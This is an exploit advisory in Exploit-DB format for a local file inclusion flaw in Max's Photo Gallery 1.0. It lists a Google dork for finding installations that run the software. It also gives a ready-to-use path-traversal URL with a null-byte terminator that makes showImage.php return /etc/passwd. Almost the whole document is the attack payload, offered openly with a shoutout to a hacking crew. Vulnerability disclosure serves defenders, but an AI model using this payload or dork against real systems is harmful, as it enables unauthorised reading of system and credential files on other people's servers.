Max's Photo Gallery version 1.0 suffers from a local file inclusion vulnerability.
c29e086711461caf700a0cb9b6614a3127c0a18809e32ce91ef6f67523f514c0
# Exploit Title: Maxs Photo Gallery
# Google Dork: "Powered by PHP F1"
# Date: 14/03/2012
# Author: n0tch aka andmuchmore
# Software Link: http://www.phpf1.com/download.html?dl=18
# Version: 1.0
# Tested on: Windows 7 / Linux(Ubuntu)
+[-- LFI --]+
http://localhost/maximage/showImage.php?id=../../../../../../../../../../../../etc/passwd%00
+[-- Shoutz --]+
All the belegit crew..